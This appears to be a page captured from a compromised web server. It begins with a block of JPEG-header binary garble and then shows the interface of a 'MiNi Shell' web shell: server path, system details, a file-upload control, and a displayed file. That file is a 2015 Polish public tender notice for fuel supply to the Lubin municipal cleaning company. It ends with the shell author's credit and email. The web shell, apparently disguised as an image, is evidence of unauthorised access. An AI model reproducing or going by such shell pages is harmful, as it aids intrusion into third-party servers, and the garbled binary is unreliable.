JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20151125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20151125/172709-N-2015.html

<p class="kh_header"><b>Lubin: Dostawa paliw płynnych dla pojazdów i sprzętu Miejskiego Przedsiębiorstwa Oczyszczania Spółka z ograniczoną odpowiedzialnością w Lubinie</b><br>
<b>Numer ogłoszenia: 172709 - 2015; data zamieszczenia: 25.11.2015</b><br>
OGŁOSZENIE O ZAMÓWIENIU - dostawy<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b>
<!--zamówienia publicznego.</p>-->
<table class="text2">
<tr><td style="border: solid 1px; width:15px black; text-align: center;"><b>V</b></td>
<td>zamówienia publicznego</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>zawarcia umowy ramowej</td></tr>
<tr><td style="border: solid 1px; width:15px black; text-align: center;"></td>
<td>ustanowienia dynamicznego systemu zakupów (DSZ)</td></tr>
</table>


<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością , ul. Rynek 28, 59-300 Lubin, woj. dolnośląskie, tel. (76) 7249940, faks (76) 7249950.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mpo.lubin.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Podmiot prawa publicznego.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Dostawa paliw płynnych dla pojazdów i sprzętu Miejskiego Przedsiębiorstwa Oczyszczania Spółka z ograniczoną odpowiedzialnością w Lubinie.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> dostawy.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest sukcesywna dostawa nw paliw:
a) oleju napędowego ON w ilości do 200 000 litrów odpowiadającego normie 
PN-EN 59 2009 i wymaganiom jakościowym określonym w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. 2008 nr 221, poz. 1441 z późn. zm.),
b) benzyny bezołowiowej 95 w ilości do 15 000 litrów odpowiadającego normie 
PN-EN 228 2009 i wymaganiom jakościowym określonym w rozporządzeniu Ministra Gospodarki z dnia 9 grudnia 2008 r. w sprawie wymagań jakościowych dla paliw ciekłych (Dz. U. 2008 nr 221, poz. 1441 z późn. zm.).
2. Określenie przedmiotu zamówienia za pomocą nazw i kodów ze Wspólnego Słownika Zamówień CPV: 
09.13.41.00-8 Olej napędowy 
09.13.21.00-4 Benzyna bezołowiowa
3. Rodzaj - dostawa.

Oferowane paliwo może być charakteryzowane przez normy zakładowe producenta, ale jego parametry jakościowe muszą być tożsame lub lepsze od przedstawionych 
w normach i rozporządzeniach przywołanych w powyższych pkt. 

Ze względu na specyfikę działań Zamawiającego i wynikający z niej brak możliwości jednoznacznego sprecyzowania ilości i rodzaju świadczonych usług podane ilości paliw są wielkościami szacunkowymi. Zamawiający zastrzega uzależnienie realizacji zamówienia w zależności od rzeczywistych potrzeb. Zamawiający  gwarantuje wykorzystanie 50% ilości całego zamówienia w trakcie trwania umowy. Wykonawca nie będzie miał prawa dochodzenia roszczeń wobec Zamawiającego z tytułu zamówienia paliwa w ilości mniejszej niż określona w powyższych pkt. a) i b).

Warunki realizacji zamówienia:
a) Dostawy paliw będą realizowane na zasadzie doraźnych, bezgotówkowych tankowań do zbiorników wszystkich pojazdów Zamawiającego, w stacji lub stacjach paliw Wykonawcy oraz w przypadku pobierania paliwa do własnych opakowań - dotyczy sprzętu niejeżdżącego - paliwo będzie pobierane do pojemników jedynie na podstawie karty wystawionej na okaziciela.
b) Zamawiający wymaga, aby dostawy były realizowane na stacji/stacjach Wykonawcy czynnej codziennie (7 dni w tygodniu) 20 godzin na dobę wyposażonej w system automatycznej dystrybucji paliw, który pozwoli na obsługę wszystkich pojazdów Zamawiającego.
c) Wykonawca musi dysponować co najmniej 1 stacją paliw znajdującą się w granicach administracyjnych miasta Lubina.
d) W przypadku braku możliwości tankowania paliwa na stacji wskazanej w załączniku nr 5 do SIWZ (np. modernizacja, awaria, itp.), Zamawiający dopuszcza możliwość tankowania paliwa na innych stacjach zastępczych pod warunkami:
- że stacja zastępcza znajdować się będzie w granicach administracyjnych miasta Lubina, 
- że stacja zastępcza będzie spełniała wymagania określone przez Zamawiającego,
- zaakceptowanie stacji zastępczej będzie wymagało pisemnej akceptacji Zamawiającego po uprzednim powiadomieniu przez Wykonawcę  o tym fakcie,
- zmiana stacji nie może powodować przerw w dostawie paliw dla pojazdów
i sprzętu Zamawiającego.
e) Zamawiający dopuszcza dwa rodzaje bezgotówkowego rozliczania tankowanych pojazdów:
- potwierdzenie ilości i rodzaju tankowanego paliwa nastąpi poprzez własnoręczny podpis kierowcy pojazdu będącego własnością Zamawiającego,
lub
- potwierdzenie ilości i rodzaju tankowanego paliwa nastąpi przy pomocy kart   magnetycznych lub kart z mikroprocesorem i nr PIN przyporządkowanych do pojazdów Zamawiającego.
f) W przypadku zastosowania potwierdzenia tankowania przy pomocy karty  magnetycznej lub karty z mikroprocesorem i nr PIN Wykonawca zobowiązuje się:
- do wydania i dostarczenia Zamawiającemu w ramach wynagrodzenia pierwszych kart dla zgłoszonych pojazdów Zamawiającego w terminie nie dłuższym niż 15 dni od podpisania umowy w ilości 40 szt., w przypadku zwiększenia ilości pojazdów Zamawiającego w trakcie trwania umowy Wykonawca w ramach wynagrodzenia przekaże Zamawiającemu odpowiednią ilość kart, w terminie nie dłuższym niż 15 dni od zgłoszenia takiej potrzeby przez Zamawiającego (telefonicznie, e - mailem, faxem lub pisemnie),
- do wydania i dostarczenia Zamawiającemu w ramach wynagrodzenia dwóch kart wystawionych na okaziciela w terminie nie dłuższym niż 15 dni od podpisania umowy, 
- do wydania i dostarczenia Zamawiającemu odpłatnie karty zamiennej
w przypadku  braku  możliwości  bezgotówkowego tankowania pojazdu z winy Zamawiającego np. utraty lub zniszczenia karty - zgodnie z cennikiem Wykonawcy, 
- do  bezgotówkowego wydania paliwa przy pomocy karty magnetycznej lub karty 
z mikroprocesorem tylko do pojazdu, do którego karta jest przypisana. 
- W przypadku zgłoszenia przez Zamawiającego utraty karty Wykonawca zapewni jej blokadę w całej sieci stacji paliw w terminie do 24 godzin od pisemnego
(e-mailem lub faxem) zgłoszenia przez Zamawiającego. Zamawiający nie ponosi odpowiedzialności za paliwo zatankowane po 24 godzinach od zgłoszenia utraty karty,
- Wykonawca zobowiązany jest do wydawania paliw na podstawie dostarczonych kart ściśle według przyporządkowania ich do określonych pojazdów. Zamawiający ma prawo do odmowy zapłaty za paliwo zatankowane na podstawie karty nie przypisanej do danego pojazdu. Prawo odmowy zapłaty dotyczy również sytuacji tankowania paliwa do pojemników na podstawie karty innej niż na  okaziciela.
Warunki płatności:
a) Cyklicznie w dwóch  okresach  w miesiącu kalendarzowym (po 15 i ostatnim dniu kalendarzowym  miesiąca)  Wykonawca  wystawiać  będzie  Zamawiającemu zbiorcze faktury VAT obejmujące należności za faktycznie zakupione paliwo.  
b) Termin płatności wynosić będzie 21  dni od daty otrzymania faktury VAT. Do każdej faktury Wykonawca dołączy zestawienie (raport) zawierający  co najmniej nw.  informacje:
- datę i godzinę dokonania zakupu,
- ilość i rodzaj zatankowanego paliwa,
- cenę i wartość brutto zatankowanego paliwa,
- nazwisko i imię kierowcy oraz podpis kierowcy potwierdzający fakt tankowania pojazdu lub nr karty magnetycznej lub karty z mikroprocesorem i nr rejestracyjny tankowanego pojazdu,
- ilość paliwa zatankowanego na poszczególne pojazdy. 
Szczegółowy opis przedmiotu zamówienia zawarty jest w SIWZ.</p>
<p><b>II.1.5)
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
<td><b>przewiduje się udzielenie zamówień uzupełniających</b></td></tr>
</table>                            
</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li>
<li></li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 09.13.41.00-8, 09.13.21.00-4.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.12.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> 12.1	Oferta musi być zabezpieczona wadium w wysokości:  15 000,00 PLN 
(słownie: piętnaście tysięcy złotych 00/100).
12.2	Termin wniesienia wadium upływa z dniem terminu składania ofert.
12.3	Wadium musi obejmować okres związania ofertą.

Wadium może być wnoszone:
1)	w pieniądzu (wadium wnoszone w pieniądzu wpłaca się przelewem na rachunek bankowy Zamawiającego, tj. BZ WBK S.A. 63 1090 2082 0000 0001 1281 1095,
2)	w poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo - kredytowej, z tym że poręczenie kasy jest zawsze poręczeniem  pieniężnym,
3)	gwarancjach bankowych,
4)	gwarancjach ubezpieczeniowych,
5)	poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości ( Dz. U. Nr 109, poz. 1158, z późn. zmianami).
Szczegółowy sposób wniesienia wadium został opisany w SIWZ</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna warunek za spełniony, jeżeli Wykonawca wykaże że:
- dysponuje co najmniej 1 stacją paliw znajdującą się w granicach administracyjnych miasta Lubina czynną codziennie (7 dni w tygodniu) 20 godzin na dobę wyposażoną w system automatycznej dystrybucji paliw.

W celu oceny spełnienia powyższego warunku Wykonawca przedstawi Zamawiającemu wykaz stacji paliw - załącznik nr 5 do SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz narzędzi, wyposażenia zakładu i urządzeń technicznych dostępnych wykonawcy usług lub robót budowlanych w celu wykonania zamówienia wraz z informacją o podstawie do dysponowania tymi zasobami;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

</ul>

<p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>15.1	Wypełniony i podpisany  formularz oferty wraz z formularzem cenowym
        - załącznik nr 1 i 1a do SIWZ.
15.2	Pełnomocnictwo wystawione dla osoby podpisującej ofertę - tylko
w przypadku, jeżeli uprawnienie do podpisania oferty i reprezentowania podmiotu nie wynika z dokumentów załączonych do oferty.
15.3	Dokument ustanawiający pełnomocnika i upoważniający go do podpisywania oferty oraz reprezentowania podmiotów występujących wspólnie w niniejszym postępowaniu albo do reprezentowania ich w postępowaniu i zawarcia umowy
w sprawie zamówienia publicznego. - tyko w przypadku złożenia oferty wspólnej.
15.4	Informacja dotycząca powstania u Zamawiającego obowiązku podatkowego
- załącznik nr 6 do SIWZ.
Dołączenie załącznika nr 6 do oferty jest niezbędne jedynie w przypadku, gdy wybór oferty Wykonawcy będzie prowadził do powstania u Zamawiającego obowiązku podatkowego, zgodnie z przepisami o podatku od towarów i usług. Powyższe oświadczenie, należy złożyć w sytuacji, gdy Wykonawca nie wypełnia rubryki/kolumny dotyczącej podatku VAT, tj. kiedy podatek VAT nie zostanie uwzględniony przez Wykonawcę w cenie jego oferty. Brak załącznika nr 6 jest równoznaczny z oświadczeniem Wykonawcy, iż wybór jego oferty nie będzie prowadził u Zamawiającego obowiązku podatkowego.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz inne kryteria związane z przedmiotem zamówienia:</p><ul class="kh_indent_1">
<li>1 - Cena - 80</li>
<li>2 - Stały rabat - 20</li>
</ul>
<p><b>IV.2.2)</b>
<table class="text2">
<tr><td style="border: solid 1px black; width:15px; text-align: center;"><b>&nbsp;</b></td>
    <td><b>przeprowadzona będzie aukcja elektroniczna,</b> adres strony, na której będzie prowadzona: </td></tr>
</table>                            
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający przewiduje możliwość dokonania zmian zawartej w wyniku przedmiotowego postępowania umowy  w poniższych przypadkach:
22.1	zmiany danych stron umowy lub przekształcenia  podmiotu (strony umowy - Wykonawcy);
22.2	zmiany prawa podatkowego w zakresie podatku VAT na usługi objęte umową;
22.3	powierzenia podwykonawcom, za zgodą Zamawiającego, innej części zamówienia, niż wskazana w ofercie Wykonawcy.

Wszelkie zmiany umowy wymagają formy pisemnej w postaci aneksu.

Wykonawcy wspólnie ubiegający się o udzielenie zamówienia ponoszą solidarną odpowiedzialność za wykonanie umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.mpo.lubin.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością
ul. Rynek 28
59-300 Lubin.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.12.2015 godzina 10:00, miejsce: Miejskie Przedsiębiorstwo Oczyszczania Spółka z ograniczoną odpowiedzialnością
ul. Rynek 28
59-300 Lubin
pokój nr 10 (sekretariat).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com